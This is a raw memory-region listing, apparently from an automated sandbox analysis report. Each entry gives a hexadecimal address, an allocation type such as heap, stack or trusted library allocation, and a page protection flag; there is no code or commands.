1DC0000
|
direct allocation
|
page read and write
|
||
|
4320000
|
heap
|
page read and write
|
||
|
1A4000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
9A7000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
1B6EE000
|
stack
|
page read and write
|
||
|
89000
|
stack
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
1C88C000
|
stack
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
4746000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
44F4000
|
heap
|
page read and write
|
||
|
7FE8979B000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
33B9000
|
heap
|
page read and write
|
||
|
4560000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
1C700000
|
heap
|
page read and write
|
||
|
4521000
|
heap
|
page read and write
|
||
|
475B000
|
heap
|
page read and write
|
||
|
3B8000
|
stack
|
page read and write
|
||
|
1A730000
|
heap
|
page execute and read and write
|
||
|
509000
|
heap
|
page read and write
|
||
|
1B500000
|
heap
|
page read and write
|
||
|
394000
|
heap
|
page read and write
|
||
|
46CA000
|
heap
|
page read and write
|
||
|
1A7E4000
|
heap
|
page read and write
|
||
|
7D7000
|
unkown
|
page readonly
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
64E000
|
heap
|
page read and write
|
||
|
3900000
|
trusted library allocation
|
page read and write
|
||
|
47A000
|
heap
|
page read and write
|
||
|
22FF000
|
stack
|
page read and write
|
||
|
459A000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
5C0000
|
direct allocation
|
page read and write
|
||
|
7FE8B023000
|
trusted library allocation
|
page execute and read and write
|
||
|
5159000
|
heap
|
page read and write
|
||
|
475D000
|
heap
|
page read and write
|
||
|
1B2D0000
|
heap
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
C0000
|
heap
|
page read and write
|
||
|
4679000
|
heap
|
page read and write
|
||
|
4DD1000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
1F80000
|
direct allocation
|
page read and write
|
||
|
12481000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B2E0000
|
trusted library allocation
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
44BA000
|
heap
|
page read and write
|
||
|
7FE8B030000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
7D1000
|
unkown
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
1AAB9000
|
stack
|
page read and write
|
||
|
7FE8B204000
|
trusted library allocation
|
page read and write
|
||
|
1EF000
|
trusted library allocation
|
page read and write
|
||
|
197000
|
heap
|
page read and write
|
||
|
2D6000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
26B0000
|
trusted library allocation
|
page read and write
|
||
|
2A8000
|
heap
|
page read and write
|
||
|
1CF0000
|
trusted library allocation
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
605000
|
heap
|
page read and write
|
||
|
4DF6000
|
heap
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
34FD000
|
trusted library allocation
|
page read and write
|
||
|
1A833000
|
heap
|
page read and write
|
||
|
266000
|
heap
|
page read and write
|
||
|
29B000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
321000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
33C4000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
27DE000
|
stack
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
3D6000
|
heap
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
264F000
|
stack
|
page read and write
|
||
|
7FE897A0000
|
trusted library allocation
|
page read and write
|
||
|
1247F000
|
trusted library allocation
|
page read and write
|
||
|
1A738000
|
heap
|
page execute and read and write
|
||
|
63F000
|
heap
|
page read and write
|
||
|
34F5000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
7FE89793000
|
trusted library allocation
|
page read and write
|
||
|
120000
|
heap
|
page read and write
|
||
|
22C1000
|
trusted library allocation
|
page read and write
|
||
|
321000
|
heap
|
page read and write
|
||
|
18A000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
33DB000
|
heap
|
page read and write
|
||
|
334B000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
50E1000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A9D000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
4DEE000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
21B2000
|
heap
|
page read and write
|
||
|
8B4000
|
heap
|
page read and write
|
||
|
4502000
|
heap
|
page read and write
|
||
|
33C3000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
419000
|
heap
|
page read and write
|
||
|
2EE000
|
heap
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
1C3C5000
|
heap
|
page read and write
|
||
|
475B000
|
heap
|
page read and write
|
||
|
450D000
|
heap
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
53E5000
|
heap
|
page read and write
|
||
|
2523000
|
trusted library allocation
|
page read and write
|
||
|
3AE000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
28BF000
|
stack
|
page read and write
|
||
|
458D000
|
heap
|
page read and write
|
||
|
4C23000
|
heap
|
page read and write
|
||
|
4DEF000
|
heap
|
page read and write
|
||
|
3E0F000
|
stack
|
page read and write
|
||
|
1EC0000
|
direct allocation
|
page read and write
|
||
|
4589000
|
heap
|
page read and write
|
||
|
3A20000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
2244000
|
heap
|
page read and write
|
||
|
3429000
|
heap
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
33C8000
|
heap
|
page read and write
|
||
|
4500000
|
heap
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
1DA0000
|
direct allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
439E000
|
heap
|
page read and write
|
||
|
4488000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
4DF9000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
1C265000
|
heap
|
page read and write
|
||
|
2375000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3352000
|
heap
|
page read and write
|
||
|
1A650000
|
heap
|
page execute and read and write
|
||
|
34FD000
|
trusted library allocation
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
4DD1000
|
heap
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
122F1000
|
trusted library allocation
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
471C000
|
heap
|
page read and write
|
||
|
60000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
7FE8B0DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
3539000
|
heap
|
page read and write
|
||
|
7FE89A40000
|
trusted library allocation
|
page read and write
|
||
|
729F6000
|
unkown
|
page readonly
|
||
|
4D97000
|
heap
|
page read and write
|
||
|
3F2A000
|
direct allocation
|
page execute and read and write
|
||
|
2219000
|
stack
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
1C60E000
|
stack
|
page read and write
|
||
|
3940000
|
heap
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
663000
|
heap
|
page read and write
|
||
|
1A76E000
|
heap
|
page execute and read and write
|
||
|
2EDF000
|
stack
|
page read and write
|
||
|
26AF000
|
stack
|
page read and write
|
||
|
5159000
|
heap
|
page read and write
|
||
|
4679000
|
heap
|
page read and write
|
||
|
34F3000
|
trusted library allocation
|
page read and write
|
||
|
FE000
|
heap
|
page read and write
|
||
|
F0000
|
heap
|
page read and write
|
||
|
19D000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3379000
|
heap
|
page read and write
|
||
|
2655000
|
trusted library allocation
|
page read and write
|
||
|
141000
|
heap
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
308000
|
heap
|
page read and write
|
||
|
4521000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
6A2B1000
|
unkown
|
page execute read
|
||
|
7FE89836000
|
trusted library allocation
|
page read and write
|
||
|
2B2000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
5D2A000
|
direct allocation
|
page execute and read and write
|
||
|
33A4000
|
heap
|
page read and write
|
||
|
B26000
|
heap
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
471E000
|
heap
|
page read and write
|
||
|
1A52F000
|
stack
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
7A5000
|
unkown
|
page read and write
|
||
|
183000
|
direct allocation
|
page read and write
|
||
|
1ADDB000
|
heap
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
180000
|
direct allocation
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
7FE89A10000
|
trusted library allocation
|
page read and write
|
||
|
1EA0000
|
direct allocation
|
page read and write
|
||
|
1CC1F000
|
stack
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
5159000
|
heap
|
page read and write
|
||
|
3695000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
1EB6000
|
heap
|
page read and write
|
||
|
1A7DF000
|
stack
|
page read and write
|
||
|
4D22000
|
heap
|
page read and write
|
||
|
3384000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B024000
|
trusted library allocation
|
page read and write
|
||
|
4D65000
|
heap
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
3E9000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
392E000
|
stack
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
1AE0C000
|
heap
|
page read and write
|
||
|
225000
|
stack
|
page read and write
|
||
|
1A875000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
34F9000
|
trusted library allocation
|
page read and write
|
||
|
2A6D000
|
trusted library allocation
|
page read and write
|
||
|
45A000
|
heap
|
page read and write
|
||
|
3504000
|
trusted library allocation
|
page read and write
|
||
|
7FE89782000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B250000
|
trusted library allocation
|
page read and write
|
||
|
3428000
|
heap
|
page read and write
|
||
|
7FE8B320000
|
trusted library allocation
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
1F40000
|
direct allocation
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
1C97F000
|
stack
|
page read and write
|
||
|
3628000
|
trusted library allocation
|
page read and write
|
||
|
122D1000
|
trusted library allocation
|
page read and write
|
||
|
4508000
|
heap
|
page read and write
|
||
|
1A83C000
|
heap
|
page read and write
|
||
|
1A8B0000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
5156000
|
heap
|
page read and write
|
||
|
2E8D000
|
trusted library allocation
|
page read and write
|
||
|
514C000
|
heap
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
282000
|
heap
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page read and write
|
||
|
4521000
|
heap
|
page read and write
|
||
|
1F00000
|
direct allocation
|
page read and write
|
||
|
5EE000
|
heap
|
page read and write
|
||
|
1A6DB000
|
stack
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
4DB1000
|
heap
|
page read and write
|
||
|
4EB000
|
heap
|
page read and write
|
||
|
1B795000
|
heap
|
page read and write
|
||
|
334F000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
3D4000
|
heap
|
page read and write
|
||
|
33A4000
|
heap
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B1E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page read and write
|
||
|
4679000
|
heap
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
4703000
|
heap
|
page read and write
|
||
|
1C232000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
7FE899B0000
|
trusted library allocation
|
page read and write
|
||
|
1DA0000
|
heap
|
page read and write
|
||
|
33DB000
|
heap
|
page read and write
|
||
|
4D1B000
|
heap
|
page read and write
|
||
|
4502000
|
heap
|
page read and write
|
||
|
111000
|
heap
|
page read and write
|
||
|
7FE89840000
|
trusted library allocation
|
page execute and read and write
|
||
|
319000
|
heap
|
page read and write
|
||
|
266F000
|
trusted library allocation
|
page read and write
|
||
|
59D000
|
direct allocation
|
page read and write
|
||
|
7FE8B290000
|
trusted library allocation
|
page read and write
|
||
|
18F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89988000
|
trusted library allocation
|
page read and write
|
||
|
19E000
|
heap
|
page read and write
|
||
|
2370000
|
heap
|
page read and write
|
||
|
59F000
|
direct allocation
|
page read and write
|
||
|
122C1000
|
trusted library allocation
|
page read and write
|
||
|
419000
|
heap
|
page read and write
|
||
|
7FE8B370000
|
trusted library allocation
|
page read and write
|
||
|
1A804000
|
heap
|
page read and write
|
||
|
2AB0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AFA000
|
trusted library allocation
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
6A2B4000
|
unkown
|
page readonly
|
||
|
230000
|
heap
|
page read and write
|
||
|
1C3AC000
|
heap
|
page read and write
|
||
|
7FE8B033000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
2360000
|
remote allocation
|
page read and write
|
||
|
26B0000
|
trusted library allocation
|
page read and write
|
||
|
1FA7000
|
direct allocation
|
page read and write
|
||
|
5EC000
|
heap
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
4EB000
|
heap
|
page read and write
|
||
|
897000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
7FE89866000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
448E000
|
heap
|
page read and write
|
||
|
39D000
|
heap
|
page read and write
|
||
|
4DEE000
|
heap
|
page read and write
|
||
|
89000
|
stack
|
page read and write
|
||
|
4C23000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
459000
|
heap
|
page read and write
|
||
|
2529000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
7FE8B280000
|
trusted library allocation
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
4DD3000
|
heap
|
page read and write
|
||
|
2AF000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
4504000
|
heap
|
page read and write
|
||
|
464F000
|
heap
|
page read and write
|
||
|
7FE89A50000
|
trusted library allocation
|
page read and write
|
||
|
3503000
|
trusted library allocation
|
page read and write
|
||
|
4508000
|
heap
|
page read and write
|
||
|
1A448000
|
stack
|
page read and write
|
||
|
4509000
|
heap
|
page read and write
|
||
|
7FE89A00000
|
trusted library allocation
|
page read and write
|
||
|
43B2000
|
heap
|
page read and write
|
||
|
4AE000
|
heap
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
1B11C000
|
stack
|
page read and write
|
||
|
4560000
|
heap
|
page read and write
|
||
|
4DEE000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
50E0000
|
heap
|
page read and write
|
||
|
133000
|
heap
|
page read and write
|
||
|
24C4000
|
trusted library allocation
|
page read and write
|
||
|
4DD6000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
4560000
|
heap
|
page read and write
|
||
|
458C000
|
heap
|
page read and write
|
||
|
1C3C0000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
2F4A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
4C29000
|
heap
|
page read and write
|
||
|
4C12000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
33C6000
|
heap
|
page read and write
|
||
|
12A000
|
heap
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
3379000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
1B09E000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
43DA000
|
heap
|
page read and write
|
||
|
450F000
|
heap
|
page read and write
|
||
|
450D000
|
heap
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
7D7000
|
unkown
|
page readonly
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
7FE89783000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D00000
|
trusted library allocation
|
page read and write
|
||
|
4DD1000
|
heap
|
page read and write
|
||
|
21F0000
|
heap
|
page execute and read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
672A000
|
direct allocation
|
page execute and read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
361E000
|
stack
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
464B000
|
heap
|
page read and write
|
||
|
7FE8B230000
|
trusted library allocation
|
page read and write
|
||
|
2527000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B2C0000
|
trusted library allocation
|
page read and write
|
||
|
3352000
|
heap
|
page read and write
|
||
|
3429000
|
heap
|
page read and write
|
||
|
7FE8B300000
|
trusted library allocation
|
page read and write
|
||
|
12F000
|
heap
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
3625000
|
trusted library allocation
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
712A000
|
direct allocation
|
page execute and read and write
|
||
|
33C3000
|
heap
|
page read and write
|
||
|
7B2A000
|
direct allocation
|
page execute and read and write
|
||
|
4508000
|
heap
|
page read and write
|
||
|
7FE89AC3000
|
trusted library allocation
|
page read and write
|
||
|
2AE000
|
heap
|
page read and write
|
||
|
4714000
|
heap
|
page read and write
|
||
|
448E000
|
heap
|
page read and write
|
||
|
3379000
|
heap
|
page read and write
|
||
|
2C85000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
33A6000
|
heap
|
page read and write
|
||
|
4415000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
2624000
|
heap
|
page read and write
|
||
|
187000
|
direct allocation
|
page read and write
|
||
|
7FE89937000
|
trusted library allocation
|
page read and write
|
||
|
2521000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B220000
|
trusted library allocation
|
page read and write
|
||
|
2BA0000
|
trusted library allocation
|
page execute read
|
||
|
4508000
|
heap
|
page read and write
|
||
|
4DD6000
|
heap
|
page read and write
|
||
|
294000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
475000
|
heap
|
page read and write
|
||
|
53E0000
|
heap
|
page read and write
|
||
|
261D000
|
stack
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
1F90000
|
direct allocation
|
page read and write
|
||
|
434000
|
heap
|
page read and write
|
||
|
4500000
|
heap
|
page read and write
|
||
|
7FE8B2A0000
|
trusted library allocation
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
5156000
|
heap
|
page read and write
|
||
|
45A000
|
heap
|
page read and write
|
||
|
1AA0E000
|
stack
|
page read and write
|
||
|
415000
|
heap
|
page read and write
|
||
|
729F0000
|
unkown
|
page readonly
|
||
|
334C000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
7FE89AFD000
|
trusted library allocation
|
page read and write
|
||
|
1D60000
|
direct allocation
|
page read and write
|
||
|
4C16000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
3352000
|
heap
|
page read and write
|
||
|
1F30000
|
heap
|
page read and write
|
||
|
462000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
789000
|
unkown
|
page read and write
|
||
|
4509000
|
heap
|
page read and write
|
||
|
4EB000
|
heap
|
page read and write
|
||
|
1C347000
|
heap
|
page read and write
|
||
|
43A2000
|
heap
|
page read and write
|
||
|
7FE8B240000
|
trusted library allocation
|
page read and write
|
||
|
3CD0000
|
heap
|
page read and write
|
||
|
3DE1000
|
trusted library allocation
|
page read and write
|
||
|
1A87F000
|
stack
|
page read and write
|
||
|
1B7CB000
|
heap
|
page read and write
|
||
|
462000
|
heap
|
page read and write
|
||
|
468E000
|
heap
|
page read and write
|
||
|
4B20000
|
trusted library allocation
|
page read and write
|
||
|
12E000
|
heap
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
450E000
|
heap
|
page read and write
|
||
|
16B000
|
heap
|
page read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
3628000
|
trusted library allocation
|
page read and write
|
||
|
476000
|
heap
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
475C000
|
heap
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
6A2B0000
|
unkown
|
page readonly
|
||
|
33DB000
|
heap
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
231E000
|
trusted library allocation
|
page read and write
|
||
|
2A6F000
|
trusted library allocation
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
12426000
|
trusted library allocation
|
page read and write
|
||
|
3421000
|
heap
|
page read and write
|
||
|
1FB0000
|
direct allocation
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
5159000
|
heap
|
page read and write
|
||
|
3C6E000
|
stack
|
page read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
33A4000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
322000
|
heap
|
page read and write
|
||
|
164000
|
heap
|
page read and write
|
||
|
33DB000
|
heap
|
page read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
333E000
|
heap
|
page read and write
|
||
|
4DF6000
|
heap
|
page read and write
|
||
|
4AE000
|
heap
|
page read and write
|
||
|
1FB7000
|
direct allocation
|
page read and write
|
||
|
1AAC0000
|
heap
|
page read and write
|
||
|
924000
|
heap
|
page read and write
|
||
|
7FE8B0D6000
|
trusted library allocation
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
4739000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
1C84F000
|
stack
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
4DF6000
|
heap
|
page read and write
|
||
|
29B000
|
heap
|
page read and write
|
||
|
468E000
|
heap
|
page read and write
|
||
|
7FE8B270000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B330000
|
trusted library allocation
|
page read and write
|
||
|
34F9000
|
trusted library allocation
|
page read and write
|
||
|
514B000
|
heap
|
page read and write
|
||
|
154000
|
heap
|
page read and write
|
||
|
7B3000
|
unkown
|
page read and write
|
||
|
7B3000
|
unkown
|
page read and write
|
||
|
1AE6B000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
450D000
|
heap
|
page read and write
|
||
|
4719000
|
heap
|
page read and write
|
||
|
7FE89830000
|
trusted library allocation
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
1C16C000
|
stack
|
page read and write
|
||
|
278000
|
heap
|
page read and write
|
||
|
450A000
|
heap
|
page read and write
|
||
|
1C48D000
|
stack
|
page read and write
|
||
|
49D000
|
heap
|
page read and write
|
||
|
20FE000
|
stack
|
page read and write
|
||
|
307C000
|
stack
|
page read and write
|
||
|
459000
|
heap
|
page read and write
|
||
|
4DAD000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
450B000
|
heap
|
page read and write
|
||
|
4C7C000
|
heap
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
5159000
|
heap
|
page read and write
|
||
|
34FF000
|
trusted library allocation
|
page read and write
|
||
|
192000
|
stack
|
page read and write
|
||
|
67000
|
heap
|
page read and write
|
||
|
49E000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
34F9000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
1A658000
|
heap
|
page execute and read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
7FE8B02D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CA60000
|
heap
|
page read and write
|
||
|
4500000
|
heap
|
page read and write
|
||
|
450F000
|
heap
|
page read and write
|
||
|
3535000
|
heap
|
page read and write
|
||
|
154000
|
heap
|
page read and write
|
||
|
7FE89990000
|
trusted library allocation
|
page read and write
|
||
|
2672000
|
trusted library allocation
|
page read and write
|
||
|
4650000
|
heap
|
page read and write
|
||
|
64A000
|
heap
|
page read and write
|
||
|
1F84000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
458A000
|
heap
|
page read and write
|
||
|
18C000
|
stack
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
34FD000
|
trusted library allocation
|
page read and write
|
||
|
4508000
|
heap
|
page read and write
|
||
|
4468000
|
heap
|
page read and write
|
||
|
1AE000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
496000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B1D7000
|
trusted library allocation
|
page read and write
|
||
|
3429000
|
heap
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
37D0000
|
trusted library allocation
|
page read and write
|
||
|
4A2000
|
heap
|
page read and write
|
||
|
276B000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
3025000
|
trusted library allocation
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
4CF9000
|
heap
|
page read and write
|
||
|
12438000
|
